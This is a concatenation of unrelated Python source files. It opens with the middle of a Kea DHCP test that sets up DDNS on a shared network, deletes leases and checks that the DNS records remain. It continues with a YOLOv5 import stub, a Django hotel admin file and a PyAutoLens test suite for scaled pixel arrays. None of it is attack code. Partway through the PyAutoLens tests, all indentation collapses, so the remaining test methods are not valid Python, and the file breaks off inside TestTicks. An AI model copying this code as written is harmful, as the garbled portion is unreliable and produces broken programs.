    srv_control.add_hooks('libdhcp_lease_cmds.so')
    srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.10-192.168.50.10')
    srv_control.config_srv_another_subnet_no_interface('192.168.51.0/24',
                                                       '192.168.51.10-192.168.51.10')
    srv_control.config_srv_another_subnet_no_interface('192.168.52.0/24',
                                                       '192.168.52.10-192.168.52.10')
    # let's get 3 different ddns settings: global, shared-network and subnet
    world.dhcp_cfg.update({"ddns-send-updates": True,
                           "ddns-generated-prefix": "six",
                           "ddns-qualifying-suffix": "example.com"})
    world.dhcp_cfg["subnet4"][1].update({"ddns-send-updates": True,
                                         "ddns-generated-prefix": "abc",
                                         "ddns-qualifying-suffix": "example.com"})
    srv_control.shared_subnet('192.168.50.0/24', 0)
    srv_control.shared_subnet('192.168.51.0/24', 0)
    srv_control.shared_subnet('192.168.52.0/24', 0)
    srv_control.set_conf_parameter_shared_subnet('name', '"name-abc"', 0)
    srv_control.set_conf_parameter_shared_subnet('interface', '"$(SERVER_IFACE)"', 0)
    world.dhcp_cfg["shared-networks"][0].update({"ddns-send-updates": True,
                                                 "ddns-generated-prefix": "xyz",
                                                 "ddns-qualifying-suffix": "example.com"})
    # kea-ddns config
    srv_control.add_ddns_server('127.0.0.1', '53001')
    srv_control.add_ddns_server_options('enable-updates', True)
    srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY')
    srv_control.add_forward_ddns('five.example.com.', 'EMPTY_KEY')
    srv_control.add_forward_ddns('three.example.com.', 'EMPTY_KEY')
    srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY')
    srv_control.add_reverse_ddns('51.168.192.in-addr.arpa.', 'EMPTY_KEY')
    srv_control.add_reverse_ddns('52.168.192.in-addr.arpa.', 'EMPTY_KEY')
    srv_control.build_and_send_config_files()
    srv_control.start_srv('DHCP', 'started')
    srv_control.start_srv('DNS', 'started', config_set=32)

    # let's get 3 different leases with DNS records again
    _get_address_and_update_ddns(mac='ff:ff:ff:ff:ff:01', fqdn='sth4.four.example.com.',
                                 address='192.168.50.10', arpa='10.50.168.192.in-addr.arpa.')
    _get_address_and_update_ddns(mac='ff:ff:ff:ff:ff:02', fqdn='some.five.example.com.',
                                 address='192.168.51.10', arpa='10.51.168.192.in-addr.arpa.')
    _get_address_and_update_ddns(mac='ff:ff:ff:ff:ff:03', fqdn='record.three.example.com.',
                                 address='192.168.52.10', arpa='10.52.168.192.in-addr.arpa.')

    # remove them without removing the DNS entries
    _delete_lease(extra_param={"ip-address": "192.168.50.10"}, exp_result=0)
    _delete_lease(extra_param={"ip-address": "192.168.51.10"}, exp_result=0)
    _delete_lease(extra_param={"ip-address": "192.168.52.10"}, exp_result=0)

    # and we should keep DNS records intact
    _check_fqdn_record("sth4.four.example.com.", address="192.168.50.10")
    _check_fqdn_record("some.five.example.com.", address="192.168.51.10")
    _check_fqdn_record("record.three.example.com.", address="192.168.52.10")
    _check_address_record('10.50.168.192.in-addr.arpa.', fqdn="sth4.four.example.com.")
    _check_address_record('10.51.168.192.in-addr.arpa.', fqdn="some.five.example.com.")
    _check_address_record('10.52.168.192.in-addr.arpa.', fqdn="record.three.example.com.")
# yolo/model/backbone/__init__.py (repo: f-fl0/YOLOv5-PyTorch, MIT license)
from .backbone_utils import darknet_pan_backbone
# students/k33402/Polyakov_Andrei/LR_2/hotels/hotels_app/admin.py (repo: Odyvannnn/ITMO_ICT_WebDevelopment_2021-2022, MIT license)
from django.contrib import admin

from .models import User, Hotel, Reservation, Review

admin.site.register(User)
admin.site.register(Hotel)
admin.site.register(Reservation)
admin.site.register(Review)
# test/data/array/test_scaled_array.py (repo: AshKelly/PyAutoLens, MIT license)
import os
import numpy as np
import pytest

from autolens import exc
from autolens.data.array.util import array_util, grid_util
from autolens.data.array import mask as msk
from autolens.data.array import scaled_array

test_data_dir = "{}/../../test_files/array/".format(os.path.dirname(os.path.realpath(__file__)))


@pytest.fixture(name="array_grid")
def make_array_grid():
    return scaled_array.ScaledSquarePixelArray(np.zeros((5, 5)), pixel_scale=0.5)


@pytest.fixture(name="array_grid_rectangular")
def make_array_grid_rectangular():
    return scaled_array.ScaledRectangularPixelArray(np.zeros((5, 5)), pixel_scales=(1.0, 0.5))
class TestArrayGeometry:

    class TestArrayAndTuples:

        def test__square_pixel_array__input_data_grid_3x3__centre_is_origin(self):

            data_grid = scaled_array.ScaledSquarePixelArray(array=np.ones((3, 3)), pixel_scale=1.0)

            assert data_grid.pixel_scale == 1.0
            assert data_grid.shape == (3, 3)
            assert data_grid.central_pixel_coordinates == (1.0, 1.0)
            assert data_grid.shape_arc_seconds == pytest.approx((3.0, 3.0))
            assert data_grid.arc_second_maxima == (1.5, 1.5)
            assert data_grid.arc_second_minima == (-1.5, -1.5)
            assert (data_grid == np.ones((3, 3))).all()

        def test__square_pixel_array__input_data_grid_rectangular__change_origin(self):

            data_grid = scaled_array.ScaledSquarePixelArray(array=np.ones((4, 3)), pixel_scale=0.1, origin=(1.0, 1.0))

            assert (data_grid == np.ones((4, 3))).all()
            assert data_grid.pixel_scale == 0.1
            assert data_grid.shape == (4, 3)
            assert data_grid.central_pixel_coordinates == (1.5, 1.0)
            assert data_grid.shape_arc_seconds == pytest.approx((0.4, 0.3))
            assert data_grid.arc_second_maxima == pytest.approx((1.2, 1.15), 1e-4)
            assert data_grid.arc_second_minima == pytest.approx((0.8, 0.85), 1e-4)

            data_grid = scaled_array.ScaledSquarePixelArray(array=np.ones((3, 4)), pixel_scale=0.1)

            assert (data_grid == np.ones((3, 4))).all()
            assert data_grid.pixel_scale == 0.1
            assert data_grid.shape == (3, 4)
            assert data_grid.central_pixel_coordinates == (1.0, 1.5)
            assert data_grid.shape_arc_seconds == pytest.approx((0.3, 0.4))
            assert data_grid.arc_second_maxima == pytest.approx((0.15, 0.2), 1e-4)
            assert data_grid.arc_second_minima == pytest.approx((-0.15, -0.2), 1e-4)

        def test__rectangular_pixel_grid__input_data_grid_3x3(self):

            data_grid = scaled_array.ScaledRectangularPixelArray(array=np.ones((3, 3)), pixel_scales=(2.0, 1.0))

            assert data_grid == pytest.approx(np.ones((3, 3)), 1e-4)
            assert data_grid.pixel_scales == (2.0, 1.0)
            assert data_grid.shape == (3, 3)
            assert data_grid.central_pixel_coordinates == (1.0, 1.0)
            assert data_grid.shape_arc_seconds == pytest.approx((6.0, 3.0))
            assert data_grid.arc_second_maxima == pytest.approx((3.0, 1.5), 1e-4)
            assert data_grid.arc_second_minima == pytest.approx((-3.0, -1.5), 1e-4)

        def test__rectangular_pixel_grid__input_data_grid_rectangular(self):

            data_grid = scaled_array.ScaledRectangularPixelArray(array=np.ones((4, 3)), pixel_scales=(0.2, 0.1))

            assert data_grid == pytest.approx(np.ones((4, 3)), 1e-4)
            assert data_grid.pixel_scales == (0.2, 0.1)
            assert data_grid.shape == (4, 3)
            assert data_grid.central_pixel_coordinates == (1.5, 1.0)
            assert data_grid.shape_arc_seconds == pytest.approx((0.8, 0.3), 1e-3)
            assert data_grid.arc_second_maxima == pytest.approx((0.4, 0.15), 1e-4)
            assert data_grid.arc_second_minima == pytest.approx((-0.4, -0.15), 1e-4)

            data_grid = scaled_array.ScaledRectangularPixelArray(array=np.ones((3, 4)), pixel_scales=(0.1, 0.2))

            assert data_grid == pytest.approx(np.ones((3, 4)), 1e-4)
            assert data_grid.pixel_scales == (0.1, 0.2)
            assert data_grid.shape == (3, 4)
            assert data_grid.central_pixel_coordinates == (1.0, 1.5)
            assert data_grid.shape_arc_seconds == pytest.approx((0.3, 0.8), 1e-3)
            assert data_grid.arc_second_maxima == pytest.approx((0.15, 0.4), 1e-4)
            assert data_grid.arc_second_minima == pytest.approx((-0.15, -0.4), 1e-4)

        def test__rectangular_pixel_array__input_data_grid_3x3__centre_is_yminus1_xminus2(self):

            data_grid = scaled_array.ScaledRectangularPixelArray(array=np.ones((3, 3)), pixel_scales=(2.0, 1.0),
                                                                 origin=(-1.0, -2.0))

            assert data_grid == pytest.approx(np.ones((3, 3)), 1e-4)
            assert data_grid.pixel_scales == (2.0, 1.0)
            assert data_grid.shape == (3, 3)
            assert data_grid.central_pixel_coordinates == (1.0, 1.0)
            assert data_grid.shape_arc_seconds == pytest.approx((6.0, 3.0))
            assert data_grid.origin == (-1.0, -2.0)
            assert data_grid.arc_second_maxima == pytest.approx((2.0, -0.5), 1e-4)
            assert data_grid.arc_second_minima == pytest.approx((-4.0, -3.5), 1e-4)
    class TestCentralPixel:

        def test__square_pixel_grid(self):

            grid = scaled_array.ScaledSquarePixelArray(np.zeros((3, 3)), pixel_scale=0.1)
            assert grid.central_pixel_coordinates == (1, 1)

            grid = scaled_array.ScaledSquarePixelArray(np.zeros((4, 4)), pixel_scale=0.1)
            assert grid.central_pixel_coordinates == (1.5, 1.5)

            grid = scaled_array.ScaledSquarePixelArray(np.zeros((5, 3)), pixel_scale=0.1, origin=(1.0, 2.0))
            assert grid.central_pixel_coordinates == (2.0, 1.0)

        def test__rectangular_pixel_grid(self):

            grid = scaled_array.ScaledRectangularPixelArray(np.zeros((3, 3)), pixel_scales=(2.0, 1.0))
            assert grid.central_pixel_coordinates == (1, 1)

            grid = scaled_array.ScaledRectangularPixelArray(np.zeros((4, 4)), pixel_scales=(2.0, 1.0))
            assert grid.central_pixel_coordinates == (1.5, 1.5)

            grid = scaled_array.ScaledRectangularPixelArray(np.zeros((5, 3)), pixel_scales=(2.0, 1.0), origin=(1.0, 2.0))
            assert grid.central_pixel_coordinates == (2, 1)
    class TestGrids:

        def test__square_pixel_grid__grid_2d__compare_to_array_util(self):

            grid_2d_util = grid_util.regular_grid_2d_from_shape_pixel_scales_and_origin(shape=(4, 7),
                                                                                        pixel_scales=(0.56, 0.56))

            sca = scaled_array.ScaledSquarePixelArray(array=np.zeros((4, 7)), pixel_scale=0.56)

            assert sca.grid_2d == pytest.approx(grid_2d_util, 1e-4)

        def test__square_pixel_grid__array_3x3__sets_up_arc_second_grid(self):

            sca = scaled_array.ScaledSquarePixelArray(array=np.zeros((3, 3)), pixel_scale=1.0)

            assert (sca.grid_2d == np.array([[[1., -1.], [1., 0.], [1., 1.]],
                                             [[0., -1.], [0., 0.], [0., 1.]],
                                             [[-1., -1.], [-1., 0.], [-1., 1.]]])).all()

        def test__square_pixel_grid__grid_1d__compare_to_array_util(self):

            grid_1d_util = grid_util.regular_grid_1d_from_shape_pixel_scales_and_origin(shape=(4, 7),
                                                                                        pixel_scales=(0.56, 0.56))

            sca = scaled_array.ScaledSquarePixelArray(array=np.zeros((4, 7)), pixel_scale=0.56)

            assert sca.grid_1d == pytest.approx(grid_1d_util, 1e-4)

        def test__square_pixel_grid__nonzero_centres__compare_to_array_util(self):

            grid_2d_util = grid_util.regular_grid_2d_from_shape_pixel_scales_and_origin(shape=(4, 7),
                                                                                        pixel_scales=(0.56, 0.56),
                                                                                        origin=(1.0, 3.0))

            sca = scaled_array.ScaledSquarePixelArray(array=np.zeros((4, 7)), pixel_scale=0.56, origin=(1.0, 3.0))

            assert sca.grid_2d == pytest.approx(grid_2d_util, 1e-4)

            grid_1d_util = grid_util.regular_grid_1d_from_shape_pixel_scales_and_origin(shape=(4, 7),
                                                                                        pixel_scales=(0.56, 0.56),
                                                                                        origin=(-1.0, -4.0))

            sca = scaled_array.ScaledSquarePixelArray(array=np.zeros((4, 7)), pixel_scale=0.56, origin=(-1.0, -4.0))

            assert sca.grid_1d == pytest.approx(grid_1d_util, 1e-4)

        def test__rectangular_pixel_grid__grid_2d__compare_to_array_util(self):

            grid_2d_util = grid_util.regular_grid_2d_from_shape_pixel_scales_and_origin(shape=(4, 7),
                                                                                        pixel_scales=(0.8, 0.56))

            sca = scaled_array.ScaledRectangularPixelArray(array=np.zeros((4, 7)), pixel_scales=(0.8, 0.56))

            assert sca.grid_2d == pytest.approx(grid_2d_util, 1e-4)

        def test__rectangular_pixel_grid__array_3x3__sets_up_arcsecond_grid(self):

            sca = scaled_array.ScaledRectangularPixelArray(array=np.zeros((3, 3)), pixel_scales=(1.0, 2.0))

            assert (sca.grid_2d == np.array([[[1., -2.], [1., 0.], [1., 2.]],
                                             [[0., -2.], [0., 0.], [0., 2.]],
                                             [[-1., -2.], [-1., 0.], [-1., 2.]]])).all()

        def test__rectangular_pixel_grid__grid_1d__compare_to_array_util(self):

            grid_1d_util = grid_util.regular_grid_1d_from_shape_pixel_scales_and_origin(shape=(4, 7),
                                                                                        pixel_scales=(0.8, 0.56))

            sca = scaled_array.ScaledRectangularPixelArray(array=np.zeros((4, 7)), pixel_scales=(0.8, 0.56))

            assert sca.grid_1d == pytest.approx(grid_1d_util, 1e-4)

        def test__rectangular_pixel_grid__nonzero_centres__compare_to_array_util(self):

            grid_2d_util = grid_util.regular_grid_2d_from_shape_pixel_scales_and_origin(shape=(4, 7),
                                                                                        pixel_scales=(0.8, 0.56),
                                                                                        origin=(1.0, 2.0))

            sca = scaled_array.ScaledRectangularPixelArray(array=np.zeros((4, 7)), pixel_scales=(0.8, 0.56),
                                                           origin=(1.0, 2.0))

            assert sca.grid_2d == pytest.approx(grid_2d_util, 1e-4)

            grid_1d_util = grid_util.regular_grid_1d_from_shape_pixel_scales_and_origin(shape=(4, 7),
                                                                                        pixel_scales=(0.8, 0.56),
                                                                                        origin=(-1.0, -4.0))

            sca = scaled_array.ScaledRectangularPixelArray(array=np.zeros((4, 7)), pixel_scales=(0.8, 0.56),
                                                           origin=(-1.0, -4.0))

            assert sca.grid_1d == pytest.approx(grid_1d_util, 1e-4)
    class TestConversion:

        def test__arc_second_coordinates_to_pixel_coordinates__arc_seconds_are_pixel_centres(self):

            sca = scaled_array.ScaledSquarePixelArray(array=np.zeros((2, 2)), pixel_scale=2.0)

            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(1.0, -1.0)) == (0, 0)
            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(1.0, 1.0)) == (0, 1)
            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(-1.0, -1.0)) == (1, 0)
            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(-1.0, 1.0)) == (1, 1)

            sca = scaled_array.ScaledSquarePixelArray(array=np.zeros((3, 3)), pixel_scale=3.0)

            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(3.0, -3.0)) == (0, 0)
            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(3.0, 0.0)) == (0, 1)
            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(3.0, 3.0)) == (0, 2)
            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(0.0, -3.0)) == (1, 0)
            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(0.0, 0.0)) == (1, 1)
            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(0.0, 3.0)) == (1, 2)
            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(-3.0, -3.0)) == (2, 0)
            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(-3.0, 0.0)) == (2, 1)
            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(-3.0, 3.0)) == (2, 2)

        def test__arc_second_coordinates_to_pixel_coordinates__arc_seconds_are_pixel_corners(self):

            sca = scaled_array.ScaledSquarePixelArray(array=np.zeros((2, 2)), pixel_scale=2.0)

            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(1.99, -1.99)) == (0, 0)
            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(1.99, -0.01)) == (0, 0)
            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(0.01, -1.99)) == (0, 0)
            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(0.01, -0.01)) == (0, 0)

            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(2.01, 0.01)) == (0, 1)
            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(2.01, 1.99)) == (0, 1)
            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(0.01, 0.01)) == (0, 1)
            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(0.01, 1.99)) == (0, 1)

            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(-0.01, -1.99)) == (1, 0)
            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(-0.01, -0.01)) == (1, 0)
            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(-1.99, -1.99)) == (1, 0)
            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(-1.99, -0.01)) == (1, 0)

            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(-0.01, 0.01)) == (1, 1)
            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(-0.01, 1.99)) == (1, 1)
            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(-1.99, 0.01)) == (1, 1)
            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(-1.99, 1.99)) == (1, 1)

        def test__arc_second_coordinates_to_pixel_coordinates__arc_seconds_are_pixel_centres__nonzero_centre(self):

            sca = scaled_array.ScaledSquarePixelArray(array=np.zeros((2, 2)), pixel_scale=2.0, origin=(1.0, 1.0))

            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(2.0, 0.0)) == (0, 0)
            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(2.0, 2.0)) == (0, 1)
            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(0.0, 0.0)) == (1, 0)
            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(0.0, 2.0)) == (1, 1)

            sca = scaled_array.ScaledSquarePixelArray(array=np.zeros((3, 3)), pixel_scale=3.0, origin=(3.0, 3.0))

            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(6.0, 0.0)) == (0, 0)
            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(6.0, 3.0)) == (0, 1)
            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(6.0, 6.0)) == (0, 2)
            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(3.0, 0.0)) == (1, 0)
            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(3.0, 3.0)) == (1, 1)
            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(3.0, 6.0)) == (1, 2)
            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(0.0, 0.0)) == (2, 0)
            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(0.0, 3.0)) == (2, 1)
            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(0.0, 6.0)) == (2, 2)

        def test__arc_second_coordinates_to_pixel_coordinates__arc_seconds_are_pixel_corners__nonzero_centre(self):

            sca = scaled_array.ScaledSquarePixelArray(array=np.zeros((2, 2)), pixel_scale=2.0, origin=(1.0, 1.0))

            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(2.99, -0.99)) == (0, 0)
            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(2.99, 0.99)) == (0, 0)
            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(1.01, -0.99)) == (0, 0)
            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(1.01, 0.99)) == (0, 0)

            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(3.01, 1.01)) == (0, 1)
            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(3.01, 2.99)) == (0, 1)
            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(1.01, 1.01)) == (0, 1)
            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(1.01, 2.99)) == (0, 1)

            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(0.99, -0.99)) == (1, 0)
            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(0.99, 0.99)) == (1, 0)
            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(-0.99, -0.99)) == (1, 0)
            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(-0.99, 0.99)) == (1, 0)

            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(0.99, 1.01)) == (1, 1)
            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(0.99, 2.99)) == (1, 1)
            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(-0.99, 1.01)) == (1, 1)
            assert sca.arc_second_coordinates_to_pixel_coordinates(arc_second_coordinates=(-0.99, 2.99)) == (1, 1)

        def test__square_pixel_grid__1d_arc_second_grid_to_1d_pixel_centred_grid__same_as_imaging_util(self):

            grid_arc_seconds = np.array([[0.5, -0.5], [0.5, 0.5],
                                         [-0.5, -0.5], [-0.5, 0.5]])

            grid_pixels_util = grid_util.grid_arc_seconds_1d_to_grid_pixel_centres_1d(
                grid_arc_seconds_1d=grid_arc_seconds,
                shape=(2, 2),
                pixel_scales=(2.0, 2.0))

            sca = scaled_array.ScaledSquarePixelArray(array=np.zeros((2, 2)), pixel_scale=2.0)

            grid_pixels = sca.grid_arc_seconds_to_grid_pixel_centres(grid_arc_seconds=grid_arc_seconds)

            assert (grid_pixels == grid_pixels_util).all()

        def test__square_pixel_grid__1d_arc_second_grid_to_1d_pixel_indexes_grid__same_as_imaging_util(self):

            grid_arc_seconds = np.array([[1.0, -1.0], [1.0, 1.0],
                                         [-1.0, -1.0], [-1.0, 1.0]])

            grid_pixel_indexes_util = grid_util.grid_arc_seconds_1d_to_grid_pixel_indexes_1d(
                grid_arc_seconds_1d=grid_arc_seconds,
                shape=(2, 2),
                pixel_scales=(2.0, 2.0))

            sca = scaled_array.ScaledSquarePixelArray(array=np.zeros((2, 2)), pixel_scale=2.0)

            grid_pixel_indexes = sca.grid_arc_seconds_to_grid_pixel_indexes(grid_arc_seconds=grid_arc_seconds)

            assert (grid_pixel_indexes == grid_pixel_indexes_util).all()

        def test__rectangular_pixel_grid__1d_arc_second_grid_to_1d_pixel_centred_grid__same_as_imaging_util(self):

            grid_arc_seconds = np.array([[1.0, -2.0], [1.0, 2.0],
                                         [-1.0, -2.0], [-1.0, 2.0]])

            grid_pixels_util = grid_util.grid_arc_seconds_1d_to_grid_pixel_centres_1d(
                grid_arc_seconds_1d=grid_arc_seconds,
                shape=(2, 2),
                pixel_scales=(7.0, 2.0))

            sca = scaled_array.ScaledRectangularPixelArray(array=np.zeros((2, 2)),
                                                           pixel_scales=(7.0, 2.0))

            grid_pixels = sca.grid_arc_seconds_to_grid_pixel_centres(grid_arc_seconds=grid_arc_seconds)

            assert (grid_pixels == grid_pixels_util).all()

        def test__rectangular_pixel_grid__1d_arc_second_grid_to_1d_pixel_indexes_grid__same_as_imaging_util(self):

            grid_arc_seconds = np.array([[1.0, -2.0], [1.0, 2.0],
                                         [-1.0, -2.0], [-1.0, 2.0]])

            grid_pixels_util = grid_util.grid_arc_seconds_1d_to_grid_pixel_indexes_1d(
                grid_arc_seconds_1d=grid_arc_seconds,
                shape=(2, 2),
                pixel_scales=(2.0, 4.0))

            sca = scaled_array.ScaledRectangularPixelArray(array=np.zeros((2, 2)),
                                                           pixel_scales=(2.0, 4.0))

            grid_pixels = sca.grid_arc_seconds_to_grid_pixel_indexes(grid_arc_seconds=grid_arc_seconds)

            assert (grid_pixels == grid_pixels_util).all()

        def test__rectangular_pixel_grid__1d_arc_second_grid_to_1d_pixel_grid__same_as_imaging_util(self):

            grid_arc_seconds = np.array([[1.0, -2.0], [1.0, 2.0],
                                         [-1.0, -2.0], [-1.0, 2.0]])

            grid_pixels_util = grid_util.grid_arc_seconds_1d_to_grid_pixels_1d(
                grid_arc_seconds_1d=grid_arc_seconds, shape=(2, 2), pixel_scales=(2.0, 4.0))

            sca = scaled_array.ScaledRectangularPixelArray(array=np.zeros((2, 2)),
                                                           pixel_scales=(2.0, 4.0))

            grid_pixels = sca.grid_arc_seconds_to_grid_pixels(grid_arc_seconds=grid_arc_seconds)

            assert (grid_pixels == grid_pixels_util).all()

        def test__square_pixel_grid__1d_pixel_grid_to_1d_pixel_centred_grid__same_as_imaging_util(self):

            grid_pixels = np.array([[0, 0], [0, 1],
[1, 0], [1, 1]])
grid_pixels_util = grid_util.grid_pixels_1d_to_grid_arc_seconds_1d(
grid_pixels_1d=grid_pixels,
shape=(2, 2),
pixel_scales=(2.0, 2.0))
sca = scaled_array.ScaledSquarePixelArray(array=np.zeros((2, 2)), pixel_scale=2.0)
grid_pixels = sca.grid_pixels_to_grid_arc_seconds(grid_pixels=grid_pixels)
assert (grid_pixels == grid_pixels_util).all()
def test__square_pixel_grid__1d_pixel_grid_to_1d_pixel_grid__same_as_imaging_util(self):
grid_pixels = np.array([[0, 0], [0, 1],
[1, 0], [1, 1]])
grid_pixels_util = grid_util.grid_pixels_1d_to_grid_arc_seconds_1d(
grid_pixels_1d=grid_pixels, shape=(2, 2), pixel_scales=(2.0, 2.0))
sca = scaled_array.ScaledSquarePixelArray(array=np.zeros((2, 2)), pixel_scale=2.0)
grid_pixels = sca.grid_pixels_to_grid_arc_seconds(grid_pixels=grid_pixels)
assert (grid_pixels == grid_pixels_util).all()
def test__square_pixel_grid__grids_with_nonzero_centres__same_as_imaging_util(self):
grid_arc_seconds = np.array([[1.0, -2.0], [1.0, 2.0],
[-1.0, -2.0], [-1.0, 2.0]])
sca = scaled_array.ScaledSquarePixelArray(array=np.zeros((2, 2)), pixel_scale=2.0, origin=(1.0, 2.0))
grid_pixels_util = grid_util.grid_arc_seconds_1d_to_grid_pixels_1d(
grid_arc_seconds_1d=grid_arc_seconds, shape=(2, 2), pixel_scales=(2.0, 2.0), origin=(1.0, 2.0))
grid_pixels = sca.grid_arc_seconds_to_grid_pixels(grid_arc_seconds=grid_arc_seconds)
assert (grid_pixels == grid_pixels_util).all()
grid_pixels_util = grid_util.grid_arc_seconds_1d_to_grid_pixel_indexes_1d(
grid_arc_seconds_1d=grid_arc_seconds, shape=(2, 2), pixel_scales=(2.0, 2.0), origin=(1.0, 2.0))
grid_pixels = sca.grid_arc_seconds_to_grid_pixel_indexes(grid_arc_seconds=grid_arc_seconds)
assert grid_pixels == pytest.approx(grid_pixels_util, 1e-4)
grid_pixels_util = grid_util.grid_arc_seconds_1d_to_grid_pixel_centres_1d(
grid_arc_seconds_1d=grid_arc_seconds, shape=(2, 2), pixel_scales=(2.0, 2.0), origin=(1.0, 2.0))
grid_pixels = sca.grid_arc_seconds_to_grid_pixel_centres(grid_arc_seconds=grid_arc_seconds)
assert grid_pixels == pytest.approx(grid_pixels_util, 1e-4)
grid_pixels = np.array([[0, 0], [0, 1],
[1, 0], [1, 1]])
grid_arc_seconds_util = grid_util.grid_pixels_1d_to_grid_arc_seconds_1d(grid_pixels_1d=grid_pixels,
shape=(2, 2), pixel_scales=(2.0, 2.0), origin=(1.0, 2.0))
grid_arc_seconds = sca.grid_pixels_to_grid_arc_seconds(grid_pixels=grid_pixels)
assert (grid_arc_seconds == grid_arc_seconds_util).all()
def test__rectangular_pixel_grid__grids_with_nonzero_centres__same_as_imaging_util(self):
grid_arc_seconds = np.array([[1.0, -2.0], [1.0, 2.0],
[-1.0, -2.0], [-1.0, 2.0]])
sca = scaled_array.ScaledRectangularPixelArray(array=np.zeros((2, 2)), pixel_scales=(2.0, 1.0), origin=(1.0, 2.0))
grid_pixels_util = grid_util.grid_arc_seconds_1d_to_grid_pixels_1d(
grid_arc_seconds_1d=grid_arc_seconds, shape=(2, 2), pixel_scales=(2.0, 1.0), origin=(1.0, 2.0))
grid_pixels = sca.grid_arc_seconds_to_grid_pixels(grid_arc_seconds=grid_arc_seconds)
assert (grid_pixels == grid_pixels_util).all()
grid_pixels_util = grid_util.grid_arc_seconds_1d_to_grid_pixel_indexes_1d(
grid_arc_seconds_1d=grid_arc_seconds, shape=(2, 2), pixel_scales=(2.0, 1.0), origin=(1.0, 2.0))
grid_pixels = sca.grid_arc_seconds_to_grid_pixel_indexes(grid_arc_seconds=grid_arc_seconds)
assert (grid_pixels == grid_pixels_util).all()
grid_pixels_util = grid_util.grid_arc_seconds_1d_to_grid_pixel_centres_1d(
grid_arc_seconds_1d=grid_arc_seconds, shape=(2, 2), pixel_scales=(2.0, 1.0), origin=(1.0, 2.0))
grid_pixels = sca.grid_arc_seconds_to_grid_pixel_centres(grid_arc_seconds=grid_arc_seconds)
assert grid_pixels == pytest.approx(grid_pixels_util, 1e-4)
grid_pixels = np.array([[0, 0], [0, 1],
[1, 0], [1, 1]])
grid_arc_seconds_util = grid_util.grid_pixels_1d_to_grid_arc_seconds_1d(grid_pixels_1d=grid_pixels,
shape=(2, 2), pixel_scales=(2.0, 1.0), origin=(1.0, 2.0))
grid_arc_seconds = sca.grid_pixels_to_grid_arc_seconds(grid_pixels=grid_pixels)
assert (grid_arc_seconds == grid_arc_seconds_util).all()
class TestTicks:
def test__square_pixel_grid__yticks(self):
sca = scaled_array.ScaledSquarePixelArray(array=np.ones((3, 3)), pixel_scale=1.0)
assert sca.yticks == pytest.approx(np.array([-1.5, -0.5, 0.5, 1.5]), 1e-3)
sca = scaled_array.ScaledSquarePixelArray(array=np.ones((3, 3)), pixel_scale=0.5)
